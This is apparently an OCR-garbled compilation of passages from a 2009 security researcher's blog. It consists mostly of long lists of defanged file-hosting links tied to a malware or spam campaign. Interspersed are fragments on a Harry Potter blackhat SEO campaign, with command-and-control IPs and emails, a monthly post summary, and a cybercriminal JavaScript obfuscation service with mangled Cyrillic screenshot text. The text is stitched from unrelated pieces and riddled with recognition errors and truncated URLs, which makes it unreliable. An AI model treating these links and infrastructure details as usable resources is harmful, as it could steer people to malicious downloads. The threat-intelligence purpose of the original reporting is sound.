hxxp://www. badongo.com /file/4368706 

hxxp://www. badongo.com /file/4368914 
hxxp://www.badongo.com/file/4369411 
hxxp://www.filefactory.com/file/2877cd/ 
hxxp://www.filefactory.com/file/6cee42/ 
hxxp://www.filefactory.com/file/842cd0/ 
hxxp://www.filefactory.com/file/112545/ 
hxxp://www.filefactory.com/file/17547d/ 
hxxp://www.fileflyer.com/view/UUqcuB3 
hxxp://www.fileflyer.com/view/EUTSgBM 
hxxp://share-online.biz/dl/1/7 7VMHOVO1 
hxxp://share-online.biz/dl/1/82WXS6M17 
hxxp://share-online.biz/dl/1/55VCS0Z84 
hxxp://share-online.biz/dl/1/O2HXO9C31 
hxxp://share-online.biz/dl/1/63FDP9G78 
hxxp://www.megaupload.com/?d=QI1XDFNH 
hxxp://www.megaupload.com/?d=8XH1E1S6 
hxxp://www.megaupload.com/?d=UIFCUOZ4 
hxxp://www.megaupload.com/?d=RS3M0934 
hxxp://www.megaupload.com/?d=WLI76Z6W 
hxxp://www.megaupload.com/?d=6H6R6VZN 
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hxxp://www.megaupload.com/?d=KBHCKKA]J 
hxxp://www.zshare.net/video/36627891f6b98c/ 
hxxp://www.zshare.net/video/366292790dadf1/ 
hxxp://www.megaupload.com/?d=OO0W3CZG 
hxxp://www.zshare.net/video/3662690eb0d448/ 
hxxp://www.zshare.net/video/366274904d740b/ 
hxxp://www.zshare.net/video/36628384132557/ 
hxxp://www.savefile.info/file/3793/esteh-avi.html 
hxxp://www.savefile.info/file/3794/esteh-avi.html 
hxxp://www.savefile.info/file/3792/esteh-avi.html 
hxxp://4filehosting.com/file/73240/esteh-avi.html 
hxxp://www.youploadit.com/file/540/esteh.avi.html 
hxxp://primeupload.com/file/131616/esteh.avi.html 
hxxp://www.zshare.net/download/3661447f9d1f9a/ 
hxxp://www.zshare.net/download/366209521079e3/ 
hxxp://www.zshare.net/download/36624829781296/ 
hxxp://www.zshare.net/download/3663299b72d956/ 
hxxp://rapidshare.com/files/55900724/estish.avi.html 
hxxp://rapidshare.com/files/55901170/estish.avi.html 
hxxp://rapidshare.com/files/55901570/estish.avi.html 
hxxp://rapidshare.com/files/55902218/estish.avi.html 
hxxp://rapidshare.com/files/55903333/estish.avi.html 
hxxp://rapidshare.com/files/55963190/esteh.avi.htm! 
hxxp://rapidshare.com/files/55963113/esteh.avi.html 
hxxp://picshome.com/download.php?id=B8A172941 
hxxp://rapidshare.com/files/55893765/esteh.avi.html 

hxxp://www.maxishare.net/en/file/2 741/esteh-avi.html 
hxxp://www.upitus.com/download.php?file=45c49892 
hxxp://www.megafileupload.com/en/file/10377/esteh-avi.htm! 
hxxp://www3.oxedion.com/index.php/downloads/ed362af29e48c6606ef3c982a7a5b 911? 
hxxp://www4.oxedion.com/index.php/downloads/8a09535521d028b130bf072cbee527ee? 
hxxp://www1.oxedion.com/index.php/downloads/fe0bc22970562914ede4df00d87a5f6 7? 
hxxp://www1.oxedion.com/index.php/downloads/e5c07a6446b523a1b3a57b75229cfb7 3? 
hxxp://www3.oxedion.com/index.php/downloads/b65ce89c67b7c68907bab647bc06fea 2? 


hxxp://www.uploadcomet.com/download.php?file=1d7ae62c34e4270accd6c5351bd41d 05 
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hxxp://www.upload.pk/freeupload/download.php?file=1d7ae62c34e4270accd6c5351 
bd41d05 


hxxp://www.mercuryupload.com/media/download.php?file=1d7ae62c34e4270accd6c5 
351bd41d05 


hxxp://fyad.org/pi2e 
hxxp://www.megashare.com/274018 
hxxp://www.megashare.com/274020 
hxxp://www.megashare.com/274022 
hxxp://depositfiles.com/files/17 79338 
hxxp://depositfiles.com/files/1776024 
hxxp://www.badongo.com/file/4369997 
hxxp://www.badongo.com/file/4369826 
hxxp://www.fileflyer.com/view/xPZU2AM 
hxxp://share-online.biz/dl/1/34UTZ2E21 
hxxp://www.fileflyer.com/view/b2TqQAy 
hxxp://www.fileflyer.com/view/wmcgJA7 
hxxp://www.zshare.net/video/3660497ff425f5/ 
hxxp://www.megaupload.com/?d=65K8U8GW 
hxxp://www.megaupload.com/?d=GC1DURIL 
hxxp://4filehosting.com/file/73231/esteh-wmv.htm| 
hxxp://4filehosting.com/file/73235/esteh-wmv.htm| 
hxxp://www.savefile.info/file/3791/esteh-wmv.html 
hxxp://www.savefile.info/file/3795/esteh-wmv.html 
hxxp://www.savefile.info/file/3796/esteh-wmv.html 
hxxp://www.savefile.info/file/3797/esteh-wmv.html 
hxxp://4filehosting.com/file/73242/esteh-wmv.html 
hxxp://www.zshare.net/download/36644271eb7263/ 
hxxp://www.zshare.net/download/3664110dd872da/ 
hxxp://primeupload.com/file/131617/esteh.wmv.html 
hxxp://picshome.com/download.php?id=OFF42D861 
hxxp://www.upitus.com/download.php?file=a132547b 
hxxp://rapidshare.com/files/55963217/esteh.wmv.html 
hxxp://rapidshare.com/files/55896392/esteh.wmv.html 
hxxp://www.maxishare.net/en/file/2742/esteh-wmv.html 
hxxp://rapidshare.com/files/55918959/saaaaaa.zip.html 
hxxp://rapidshare.com/files/55922710/wwwwwwwwa.zip.html 
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tube-best-4free .com 
tube-collection .com 
tvtesttube .com 
yourtubetop .com 


Who’s behind these domains and the Harry Potter blackhat SEO campaign? But, "of course", 
it’s the "[8]fan club" with the [9]Koobface connection, continuing to use [10]the same phone 
back locations that they’ve been using during [11]the past couple of months - myart-gallery 
.com/senm.php - 64.27.5.202 - Email: jnthndni@gmail.com; robert-art .com/senm.php - 
66.199.229.229 - Email: robesha@gmail.com; superarthome .com/senm.php - 
216.240.146.119 - Email: chucjack@gmail.com. 


This post has been reproduced from [12]Dancho Danchev’s blog. 


| 

| 
ttp://ddanchev.blogspot.com/2009/04/bogus-linkedin-profiles-redirect-to.htm 

| 

8. http: //ddanchev. blogspot . com/2009/06/from-ukrainian-blackhat-seo-gang-with. htm 

9. 
10. 


11. http://ddanchev. blogspot .com/2009/06/from-ukrainian-blackhat-seo-gang-with_09.htm 


12. http://ddanchev. blogspot .com/ 
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5.8.1 Summarizing Zero Day’s Posts for July (2009-08-03 17:02) 
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hxxp://www.megafileupload.com/en/file/10380/esteh-wmv.html 
hxxp://www.uploadcomet.com/download.php?file=de0672f6e18c21343c2ba5d4e498 a011 


hxxp://www.upload.pk/freeupload/download.php?file=de0672f6e18c21343c2ba5d4e49 8- 
a01l 


hxxp://www.mercuryupload.com/media/download.php?file=de0672f6e18c21343c2ba5d4 
e498a011 


hxxp://fyad.org/pi2d 

hxxp://www.megashare.com/274063 
hxxp://www.megashare.com/274065 
hxxp://www.megashare.com/274069 
hxxp://depositfiles.com/files/1779344 
hxxp://depositfiles.com/files/1776125 
hxxp://www.fileflyer.com/view/6WMgTCf 
hxxp://www.megaupload.com/?d=TOFIMU2S 
hxxp://www.megaupload.com/?d=TOO8D19Z 
hxxp://www.zshare.net/video/366075603ce3e8/ 
hxxp://www.zshare.net/video/3662306a660017/ 
hxxp://www.savefile.info/file/3798/esteh3-wmv.html 
hxxp://www.savefile.info/file/3799/esteh3-wmv.html 
hxxp://www.savefile.info/file/3800/esteh3-wmv.html 
hxxp://4filehosting.com/file/73237/esteh3-wmv.html 
hxxp://4filehosting.com/file/73241/esteh3-wmv.html 
hxxp://4filehosting.com/file/73243/esteh3-wmv.html 
hxxp://www.upitus.com/download.php?file=f066d65a 
hxxp://www.upitus.com/download.php?file=711fedae 
hxxp://picshome.com/download.php?id=8173DA451 
hxxp://primeupload.com/file/131618/esteh3.wmv.html 
hxxp://rapidshare.com/files/55898156/esteh3.wmv.html 
hxxp://www.maxishare.net/en/file/2 743/esteh3-wmv.htm| 
hxxp://rapidshare.com/files/55963246/esteh3.wmv.html 
hxxp://www.megafileupload.com/en/file/10382/esteh3-wmv.htm| 
hxxp://www.viprasys.com/host/download.php?file=123esteh3.wmv 
hxxp://www.uploadcomet.com/download.php?file=569b30945bce9598921586a5c20c1b 33 


hxxp://www.upload.pk/freeupload/download.php?file=569b30945bce9598921586a5c 
20c1b33 


hxxp://www.mercuryupload.com/media/download.php?file=569b30945bce9598921586 
a5c20c1b33 
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hxxp://fyad.org/pi2f 

hxxp://file.uploadr.com/10715 
hxxp://www.megashare.com/274149 
hxxp://www.megashare.com/274151 
hxxp://www.megashare.com/274152 
hxxp://depositfiles.com/files/1779104 
hxxp://depositfiles.com/files/1776143 
hxxp://www.badongo.com/file/4371616 
hxxp://www.fileflyer.com/view/WIEjGBE 
hxxp://www.fileflyer.com/view/LWpEHBp 
hxxp://www.files.to/get/46384/9pq7ket56t 

hxxp://www. bigupload.com/d=HOSZWJAFZK 
hxxp://www.megaupload.com/?d=MRAJFLVH 
hxxp://4filehosting.com/file/73266/esteh-rar.html 
hxxp://www.savefile.info/file/3801/esteh-3gp.html 
hxxp://4filehosting.com/file/73244/esteh-3gp.html 
hxxp://4filehosting.com/file/73246/esteh-3gp.html 
hxxp://primeupload.com/file/131619/esteh.3gp.html 
hxxp://rapidshare.com/files/55959565/esteh.rar.html 
hxxp://www.zshare.net/download/36624599e23e2d/ 
hxxp://www.upitus.com/download.php?file=eb7 7f952 
hxxp://www.upitus.com/download.php?file=b13ede4b 
hxxp://picshome.com/download.php?id=C99AC8671 
hxxp://rapidshare.com/files/55898466/esteh.3gp.html 
hxxp://www.maxishare.net/en/file/2 744/esteh-3gp.html 
hxxp://tornadodrive.com/download.php/3557/esteh.rar.html 
hxxp://www.megafileupload.com/en/file/10385/esteh-3gp.html 
hxxp://www.viprasys.com/host/download.php?file=773esteh.3gp 
hxxp://www.good4upload.com/v/4368826/1189881420174.rar.html 
hxxp://www.uploadcomet.com/download.php?file=c922d7ae73b29c49b327d1e713289468 


hxxp://www.upload.pk/freeupload/download.php?file=c922d7ae73b29c49b327d1e71 
3289468 


hxxp://fyad.org/os54 
hxxp://mihd.net/hn9sgk 
hxxp://file.uploadr.com/f9ab 
hxxp://up.spbland.ru/files/07080311/ 
24724 


hxxp://depositfiles.com/files/1387137 
hxxp://www.sendmefile.com/00565226 
hxxp://www.badongo.com/file/3928802 
hxxp://www.fileflyer.com/view/talngA2 
hxxp://www.sendspace.com/file/2wjmdp 
hxxp://www.fileflyer.com/view/HxumcAK 
hxxp://www.fileflyer.com/view/QdezhBC 
hxxp://www.mediafire.com/?8k5mtwyjv4d 
hxxp://www.megaupload.com/?d=0D69AU4G 
hxxp://www.megaupload.com/?d=GA66VMQC 
hxxp://www.megaupload.com/?d=UQU01DTH 
hxxp://www.arbup.org/v/8039673/cccc.rar.html 
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The following is a brief summary of all of my posts at ZDNet’s [1]Zero Day for July. 


You can also go through previous summaries for [2]June, [3]May, [4]April, [5]March, [6]Febru- 
ary, [7]JJanuary, [8]December, [9]November, [10]October, [11]September, [12]August and 
[13]July, as well as subscribe to my [14]personal RSS feed or [15]Zero Day’s main feed. 


Notable articles include - [16]Manchester City Council pays $2.4m in Conficker clean up 
costs; [17]Transmitter.c mobile malware spreading in the wild and [18]Does free antivirus 
offer a false feeling of security? 


01. [19]Manchester City Council pays $2.4m in Conficker clean up costs 
02. [20]EyeWonder malware incident affects popular web sites 

03. [21]Koobface worm joins the Twittersphere 

04. [22]Transmitter.C mobile malware spreading in the wild 

05. [23]IlmageShack hacked by anti-full disclosure movement 
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KpunToBKa 


Me YTUNMTbI ANA reHepauMu HTML Koga 


{6ygbTe npo <script> 


DEMO SCREEN 
YTUNUTbI 


Redirect URL: Get code 
Iframe URL: Get code 


Ip URL: : Get code 


Version Used Last check 
56 times 


TextUne 


109 times 


PolyLite 


Cybecriminals understand the value of quality assurance, and have been actively running 
business models on the top of it for [1]the past two years. 


From the [2]multiple offline antivirus scanners using pirated software, the [3]online de- 
tection rate checking services allowing scheduled URL scan and notification upon detection 
by antivirus vendors, to the underground alternatives of VirusTotal in the form of [4]multiple 
firewalls bypass verification checks - cybercriminals are actively benchmarking and optimizing 
their releases before launching yet another campaign. 
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Nposepka IP Ha Hanus B NucTax SpamHaus 


IP: Check 


NpoBeka AOMeHa Ha Hanus B 6NeKnucTa OT Google (firefox) 


pees 
JIOMeH: Mposeputb 


ABTOMAaTMYECKaa NPOBeKa AOMEHOB Ha Hanya MX B GNeKNMCTAaX OT 
SpamHaus, Google (firefox) 
JlaHHasn yTunuTa MNAET OTCHEKUBAa COCTOAHME BaluMX HOMEHOB. 
honanu nu o UCT WSil eT 4 BCHYyYal NONasAaHHs - 

aT BHO . 


| Status Status 
Google SpamHaus 


———————— ee ee ee 
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ABUT b HOBbIN DOMEH: 


A newly launched service aims to port a universal managed malware feature on the web - the 
polymorphic [5]obfuscation of malicious scripts in an attempt to increase [6]the lifecycle of a 
particular campaign. 


Interestingly, due to the obvious software piracy within the cybercrime ecosystem which 


allowed [7]proprietary malware tools to leak [8]in the wild, the service is using a particular 
malware kit’s javascript obfuscation routines and is running a business model on it. 
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hxxp://www.afilehost.com/file/7820/37-rar.html 
hxxp://www.savefile.info/file/2602/37-rar.html 
hxxp://primeupload.com/file/123053/37.rar.html 
hxxp://4filehosting.com/file/23271/37-rar.html 
hxxp://4filehosting.com/file/23251/37-rar.html 
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hxxp://4filehosting.com/file/232 73/037-rar.html 
hxxp://rapidshare.com/files/38017951/37.rar.html 
hxxp://4filehosting.com/file/23255/37-1-rar.html 
hxxp://rapidshare.com/files/38022981/037.rar.html 
hxxp://rapidshare.com/files/38019222/37 _1.rar.html 
hxxp://www.zshare.net/download/2329904c86d131/ 
hxxp://www.zshare.net/download/2329560a96c733/ 
hxxp://www.zshare.net/download/2329665e9842ae/ 
hxxp://www.miniuploads.com/download.php?id=5814641A 
hxxp://uploadpalace.com/en/download.php?id=2F0216D41 
hxxp://www.megafileupload.com/en/file/2833/37-rar.html 
hxxp://www.upload.pk/freeupload/down...798158b0505e33 
hxxp://www.mercuryupload.com/media/d...798158b0505e33 
hxxp://www.fileflyer.com/view/oGzyZAl 
hxxp://www.megaupload.com/?d=LODDSC9Z 
hxxp://www.arbup.org/v/5719989/f6ba62bd85.rar.html 
hxxp://d.turboupload.com/d/1913224/f6ba62bd85.rar.html 
hxxp://s16.quicksharing.com/v/9919851/f6ba62bd85.rar.html 
hxxp://www17.rapidupload.com/uploaded.php?filepath=23360 
hxxp://filehostia.com/show.php?img=2728 f6éba62bd85.rar.html 
hxxp://download.file2you.net/h2htbjvgpnjn/f6ba62bd85.rar.html 
hxxp://www.***filehost.com/?mode=viewupload &amp;id=7313940 
hxxp://fyad.org/obi9 
hxxp://depositfiles.com/files/1209035 
hxxp://depositfiles.com/files/1209041 
hxxp://depositfiles.com/files/1209135 
hxxp://depositfiles.com/files/1209139 
hxxp://depositfiles.com/files/1209141 
hxxp://depositfiles.com/files/1209143 
hxxp://depositfiles.com/files/1209191 
hxxp://www.badongo.com/vid/423630 
hxxp://www.sendspace.com/file/u7218z 
hxxp://www.megaupload.com/?d=04H77NYU 
hxxp://www.megaupload.com/?d=JADDR59J 
hxxp://www.megaupload.com/?d=WSZIDD2D 
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hxxp://www.megaupload.com/?d=ANL7052Q 
hxxp://4filehosting.com/file/40199/gfk-avi.htm! 
hxxp://4filehosting.com/file/40201/gfk-avi.htm! 
hxxp://4filehosting.com/file/40173/gfk-avi.hAtm! 
hxxp://4filehosting.com/file/40171/gfk-avi.htm! 
hxxp://www.savefile.info/file/3101/gfk-avi.html 
hxxp://www.megaupload.com/?d=UNLK4ZPG 
hxxp://www.megaupload.com/?d=MF5PBP1C 
hxxp://www.megaupload.com/?d=CTYSHB4B 
hxxp://www.zshare.net/video/2674787a9e5068/ 
hxxp://www.afilehost.com/file/8953/gfk-avi.htm| 
hxxp://www.afilehost.com/file/8959/gfk-avi.htm| 
hxxp://www.afilehost.com/file/8960/gfk-avi.htm| 
hxxp://primeupload.com/file/126496/gfk.avi.html 
hxxp://rapidshare.com/files/42685206/gfk.avi.html 
hxxp://rapidshare.com/files/42687663/gfk.avi.html 
hxxp://rapidshare.com/files/42688195/gfk.avi.html 
hxxp://rapidshare.com/files/42691713/gfk.avi.hAtm! 
hxxp://rapidshare.com/files/42691665/gfk.avi.htm! 
hxxp://rapidshare.com/files/42690516/gfk.avi.html 
hxxp://rapidshare.com/files/42690503/gfk.avi.htm! 
hxxp://rapidshare.com/files/42690397/gfk.avi.html 
hxxp://rapidshare.com/files/42690608/gfk.avi.htm! 
hxxp://www.upitus.com/download.php?file=34501934 
hxxp://www.upitus.com/download.php?file=2431322b 
hxxp://www.fileblob.com/download.php?id=EDOE6D01 
hxxp://www.megafileupload.com/en/file/4941/gfk-avi.html 
hxxp://uploadpalace.com/en/download.php?id=OFA5ADC21 
hxxp://www.upload.pk/freeupload/down...9bfc2579c38f0e 
hxxp://www.mercuryupload.com/media/d...9bfc2579c38f0e 
hxxp://fyad.org/obia 
hxxp://depositfiles.com/files/1209181 
hxxp://depositfiles.com/files/1209185 
hxxp://depositfiles.com/files/1209186 
hxxp://depositfiles.com/files/1209196 
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Polyute 


Textunescape <cextarea 


eee0e 


For the time being, it relies on three obfuscation algorithms, HTMLCryptor olnly - used 56 
times, TextUnescape - used 109 times, and PolyLite - already used 177 times. The DIY 
obfuscation service, also checks and notifies the cybercriminal over ICQ in cases when his IPs 
and domain names have been blacklisted by Google’s Safebrowsing, as well as Spamhaus, 
and more checks against public malware domain/IP databases are on the developer’s to-do 
list. 
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hxxp://depositfiles.com/files/1208949 
hxxp://www.badongo.com/file/3739814 
hxxp://www.sendspace.com/file/3wgiw7 
hxxp://www.megaupload.com/?d=C7D24XZX 
hxxp://www.megaupload.com/?d=A5Y3CQH1 
hxxp://www.megaupload.com/?d=8MVF1TET 
hxxp://4filehosting.com/file/40176/ro2-rm.html 
hxxp://4filehosting.com/file/40177/ro2-rm.html 
hxxp://www.savefile.info/file/3102/ro2-rm.html 
hxxp://www.megaupload.com/?d=SXXWX1F6 
hxxp://www.megaupload.com/?d=PMMDQBOL 
hxxp://www.afilehost.com/file/8954/ro2-rm.html 
hxxp://www.afilehost.com/file/8961/ro2-rm.html 
hxxp://primeupload.com/file/126499/ro2.rm.html 
hxxp://rapidshare.com/files/42691708/ro2.rm.html 
hxxp://rapidshare.com/files/42691688/ro2.rm.html 
hxxp://rapidshare.com/files/42691612/ro2.rm.html 
hxxp://rapidshare.com/files/42685682/ro2.rm.html 
hxxp://rapidshare.com/files/42686375/ro2.rm.html 
hxxp://www.zshare.net/download/267486988ff7c0/ 
hxxp://www.upitus.com/download.php?file=d471e508 
hxxp://www.fileblob.com/download.php?id=CF6EDA94F 
hxxp://www.megafileupload.com/en/file/4947/ro2-rm.html 
hxxp://uploadpalace.com/en/download.php?id=68D48A191 
hxxp://www.upload.pk/freeupload/down...e6cec12d966195 
hxxp://fyad.org/obib 
hxxp://depositfiles.com/files/1208933 
hxxp://www.sendmefile.com/00555918 
hxxp://www.badongo.com/file/3 739840 
hxxp://www.badongo.com/file/3741601 
hxxp://www.sendspace.com/file/rgvebo 
hxxp://www.files.to/get/65 79/fxklxvugv7 
hxxp://www.bigupload.com/d=B2B8D291 
hxxp://www.share2net.com/?id=64926651 
hxxp://www.megaupload.com/?d=JBH9FK1X 
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hxxp://www.megaupload.com/?d=OK46B89W 
hxxp://www.send-file.com/9501AA2A94DF5A3B 
hxxp://www. yourfilelink.com/get. php?fid=356976 
hxxp://www.zshare.net/download/2676949f9b922f/ 
hxxp://www.zshare.net/download/26749114e7319d/ 
hxxp://www.snaggys.com/file/466/11f47f6a13-rar.html 
hxxp://download.yousendit.com/7E8F14642B8C2DAA 
hxxp://www.upitus.com/download.php?file=b1 766902 
hxxp://www.keepmyfile.com/download/660c811731237 
hxxp://www.fileblob.com/download.php?id=95C1B392 
hxxp://4filehosting.com/file/40181/11f47f6a13-3gp.html 
hxxp://4filehosting.com/file/40180/11f47f6a13-3gp.html 
hxxp://www.savefile.info/file/3103/11f47f6a13-3gp.html 
hxxp://www.afilehost.com/file/8955/11f47f6a13-3gp.html 
hxxp://www.filevenue.com/v/925596/11f47f6a13.rar.html 
hxxp://primeupload.com/file/126501/11f47f6a13.3gp.html 
hxxp://rapidshare.com/files/42712539...f6a13.rar.html 
hxxp://rapidshare.com/files/42685331...f6a13.3gp.html 
hxxp://rapidshare.com/files/42687033...f6a13.3gp.html 
hxxp://uploadpalace.com/en/download.php?id=C8D207001 
hxxp://www.4filehosting.com/file/402...f6a13-rar.html 
hxxp://www.wikiupload.com/download _page.php?id=177376 
hxxp://www.filespoint.com/point/1983...f6a13.rar.html 
hxxp://storeandserve.com/download/81...f6a13.rar.html 
hxxp://www.megafileupload.com/en/fil...f6a13-3gp.html 
hxxp://hyperupload.com/download/0240...f6a13.rar.html 
hxxp://www.bestsharing.com/files/SIh...f6a13.rar.html 
hxxp://www.viprasys.com/host/downloa...11f47f6a13.3gp 
hxxp://www.upload.pk/freeupload/down...codc8e2e210051 
hxxp://fyad.org/obfl 
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hxxp://depositfiles.com/files/1207857 
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hxxp://depositfiles.com/files/1207814 
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hxxp://www.badongo.com/vid/423405 
hxxp://depositfiles.com/files/1206125 
hxxp://www.badongo.com/file/3 736348 
hxxp://www.badongo.com/file/3 736534 
hxxp://www.badongo.com/file/3 736430 
hxxp://www.sendspace.com/file/Ov263f 
hxxp://www.sendspace.com/file/z7qu8y 
hxxp://www.sendspace.com/file/gywwt7 
hxxp://www.sendspace.com/file/kdahkm 
hxxp://www.megaupload.com/?d=LQL9AN84 
hxxp://www.megaupload.com/?d=X8675HWZ 
hxxp://www.megaupload.com/?d=8FVIOMLX 
hxxp://www.megaupload.com/?d=IEPDONHP 
hxxp://shareoutpost.com/file/320/gf1.avi.html 
hxxp://www.megaupload.com/?d=G2UYKFK9 
hxxp://www.megaupload.com/?d=CXGTT4LV 
hxxp://www.megaupload.com/?d=SUECVK2D 
hxxp://www.megaupload.com/?d=KBRVXXKF 
hxxp://www.megaupload.com/?d=BRIW2CFR 
hxxp://4filehosting.com/file/40114/gf1-avi.html 
hxxp://4filehosting.com/file/40115/gf1-avi.html 
hxxp://4filehosting.com/file/40035/gf1-avi.html 
hxxp://www.savefile.info/file/3076/gfl-avi.html 
hxxp://www.savefile.info/file/3081/gfl-avi.html 
hxxp://www.savefile.info/file/3082/gfl-avi.html 
hxxp://www.savefile.info/file/3083/gfl-avi.html 
hxxp://www.savefile.info/file/3084/gfl-avi.html 
hxxp://www.savefile.info/file/3085/gfl-avi.html 
hxxp://www.savefile.info/file/3086/gfl-avi.html 
hxxp://www.savefile.info/file/3087/gfl-avi.html 
hxxp://www.savefile.info/file/3088/gfl-avi.html 
hxxp://www.zshare.net/video/26709126838359/ 
hxxp://www.afilehost.com/file/8947/gf1-avi.html 
hxxp://www.afilehost.com/file/8946/gf1-avi.html 
hxxp://www.afilehost.com/file/8943/gfl-avi.html 
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hxxp://www.afilehost.com/file/8923/gfl1-avi.html 
hxxp://www.afilehost.com/file/8917/gf1-avi.html 
hxxp://www.afilehost.com/file/8918/gf1-avi.html 
hxxp://www.afilehost.com/file/8915/gf1-avi.html 
hxxp://www.afilehost.com/file/8916/gf1-avi.html 
hxxp://www.afilehost.com/file/8919/gf1-avi.html 
hxxp://www.afilehost.com/file/8920/gf1-avi.html 
hxxp://www.afilehost.com/file/8921/gfl1-avi.html 
hxxp://www.afilehost.com/file/8922/gf1-avi.html 
hxxp://www.afilehost.com/file/8924/gf1-avi.html 
hxxp://www.afilehost.com/file/8925/gf1-avi.html 
hxxp://www.afilehost.com/file/8926/gf1-avi.html 
hxxp://primeupload.com/file/126449/gfl.avi.html 
hxxp://primeupload.com/file/126478/gfl.avi.html 
hxxp://primeupload.com/file/126476/gfl.avi.html 
hxxp://primeupload.com/file/126477/gfl.avi.html 
hxxp://primeupload.com/file/126475/gfl.avi.html 
hxxp://primeupload.com/file/126481/gfl.avi.html 
hxxp://primeupload.com/file/126480/gfl.avi.html 
hxxp://primeupload.com/file/126479/gfl.avi.html 
hxxp://rapidshare.com/files/42660110/gf1.avi.htm! 
hxxp://rapidshare.com/files/42660544/gf1.avi.htm| 
hxxp://rapidshare.com/files/42660145/gfl.avi.htm! 
hxxp://rapidshare.com/files/42660564/gfl.avi.htm| 
hxxp://rapidshare.com/files/42626291/gfl.avi.htm| 
hxxp://rapidshare.com/files/42626195/gfl.avi.htm| 
hxxp://4filehosting.com/file/40060/tr55555-zip.html 
hxxp://www.zshare.net/download/26718330f9a609/ 
hxxp://www.zshare.net/download/26716997737/7fe/ 
hxxp://www.zshare.net/download/267162355c6995/ 
hxxp://www.maxishare.net/en/file/1337/gf1-avi.html 
hxxp://www.maxishare.net/en/file/1338/gf1-avi.html 
hxxp://www.maxishare.net/en/file/1339/gf1l-avi.html 
hxxp://www.4filehosting.com/file/40034/gfl-avi.html 
hxxp://4filehosting.com/file/40067/rtr54rrrrrr-zip.html 
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hxxp://www.fileblob.com/download.php?id=012AA571 
hxxp://www.upitus.com/download.php?file=0337ed02 
hxxp://rapidshare.com/files/42635538/tr55555.zip.html 
hxxp://www.fileblob.com/download.php?id=A8EC1F90 
hxxp://www.fileblob.com/download.php?id=C2E46C3A 
hxxp://4filehosting.com/file/40063/re44444444-zip.html 
hxxp://www.fileblob.com/download.php?id=O0C1BE4FF 
hxxp://www.fileblob.com/download.php?id=1DB8B7DC 
hxxp://rapidshare.com/files/42638926...rrrrr.zip.html 
hxxp://www.megafileupload.com/en/file/4930/gf1-avi.html 
hxxp://rapidshare.com/files/42636835...44444.zip.html 
hxxp://uploadpalace.com/en/download.php?id=4B55B25F1 
hxxp://uploadpalace.com/en/download.php?id=CC5AFA701 
hxxp://uploadpalace.com/en/download.php?id=4CD3B90C1 
hxxp://youploadit.ipresentyou.com/do...hp?id=316486A8 
hxxp://youploadit.ipresentyou.com/do...hp?id=05B878B9 
hxxp://youploadit.ipresentyou.com/do...hp?id=496D16C1 
hxxp://youploadit.ipresentyou.com/do...hp?id=4A974CF9 
hxxp://www.uploadpalace.com/en/downl...p?id=5A50B14A1 
hxxp://www.uploadpalace.com/en/downl...p?id=F998A50A1 
hxxp://www.uploadpalace.com/en/downl...p?id=67F5AC441 
hxxp://www.uploadpalace.com/en/downl...p?id= 7A6E3F661 
hxxp://youploadit.ipresentyou.com/do...hp?id=3680B8AD 
hxxp://www.uploadpalace.com/en/downl...p?id=F14536DB1 
hxxp://www.uploadpalace.com/en/downl...p?id=9E25D30E1 
hxxp://www.uploadpalace.com/en/downl...p?id=F4F4BB831 
hxxp://www.uploadpalace.com/en/downl...p?id=2B120B8D1 
hxxp://www.uploadpalace.com/en/downl...p?id=4B19DCA41 
hxxp://youploadit.ipresentyou.com/do...hp?id=DC5BEEBC 
hxxp://www.upload.pk/freeupload/down...087b82eb434791 
hxxp://www.mercuryupload.com/media/d...087b82eb434791 
hxxp://fyad.org/obfm 
hxxp://depositfiles.com/files/1206143 
hxxp://www.badongo.com/file/3 735407 
hxxp://www.sendspace.com/file/8jyy1k 
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hxxp://www.megaupload.com/?d=VZ9MIPS2 
hxxp://www.megaupload.com/?d=ZKJ9W8D2 
hxxp://4filehosting.com/file/40036/gf2-rm.html 
hxxp://4filehosting.com/file/40038/gf2-rm.html 
hxxp://www.savefile.info/file/3077/gf2-rm.html 
hxxp://www.savefile.info/file/3090/gf2-rm.html 
hxxp://www.savefile.info/file/3091/gf2-rm.html 
hxxp://www.savefile.info/file/3089/gf2-rm.html 
hxxp://www.savefile.info/file/3092/gf2-rm.html 
hxxp://www.savefile.info/file/3093/gf2-rm.html 
hxxp://www.afilehost.com/file/892 7/gf2-rm.html 
hxxp://www.afilehost.com/file/8928/gf2-rm.html 
hxxp://www.afilehost.com/file/8929/gf2-rm.html 
hxxp://www.afilehost.com/file/8930/gf2-rm.html 
hxxp://www.afilehost.com/file/8931/gf2-rm.html 
hxxp://www.afilehost.com/file/8932/gf2-rm.html 
hxxp://www.afilehost.com/file/8944/gf2-rm.html 
hxxp://primeupload.com/file/126428/gf2.rm.htm 
hxxp://primeupload.com/file/126450/gf2.rm.html 
hxxp://primeupload.com/file/126482/gf2.rm.html 
hxxp://primeupload.com/file/126483/gf2.rm.html 
hxxp://primeupload.com/file/126484/gf2.rm.html 
hxxp://primeupload.com/file/126485/gf2.rm.html 
hxxp://primeupload.com/file/126486/gf2.rm.html 
hxxp://primeupload.com/file/126417/gf2.rm.html 
hxxp://primeupload.com/file/126419/gf2.rm.html 
hxxp://primeupload.com/file/126420/gf2.rm.html 
hxxp://primeupload.com/file/126421/gf2.rm.html 
hxxp://primeupload.com/file/126422/gf2.rm.html 
hxxp://primeupload.com/file/126423/gf2.rm.html 
hxxp://primeupload.com/file/126424/gf2.rm.html 
hxxp://primeupload.com/file/126425/gf2.rm.html 
hxxp://primeupload.com/file/126426/gf2.rm.html 
hxxp://primeupload.com/file/126427/gf2.rm.html 
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hxxp://rapidshare.com/files/42626735/gf2.rm.html 
hxxp://www.zshare.net/download/2670953d2daf79/ 
hxxp://www.maxishare.net/en/file/1340/gf2-rm.html 
hxxp://www.maxishare.net/en/file/1341/gf2-rm.html 
hxxp://www.maxishare.net/en/file/1342/gf2-rm.html 
hxxp://www.upitus.com/download.php?file=df63993b 
hxxp://www.fileblob.com/download.php?id=E8A12004 
hxxp://www.fileblob.com/download.php?id=169EC2D7 
hxxp://www.fileblob.com/download.php?id=5C61D0BO 
hxxp://www.megafileupload.com/en/file/4931/gf2-rm.html 
hxxp://uploadpalace.com/en/download.php?id=90F4BA4F1 
hxxp://youploadit.ipresentyou.com/do...hp?id=92089CB9 
hxxp://youploadit.ipresentyou.com/do...hp?id=AB578243 
hxxp://youploadit.ipresentyou.com/do...hp?id=812DC938 
hxxp://youploadit.ipresentyou.com/do...hp?id=CF1A22FE 
hxxp://youploadit.ipresentyou.com/do...hp?id=D3EBBD40 
hxxp://www.upload.pk/freeupload/down...c65c7de00e422f 
hxxp://fyad.org/obfn 
hxxp://depositfiles.com/files/1206160 
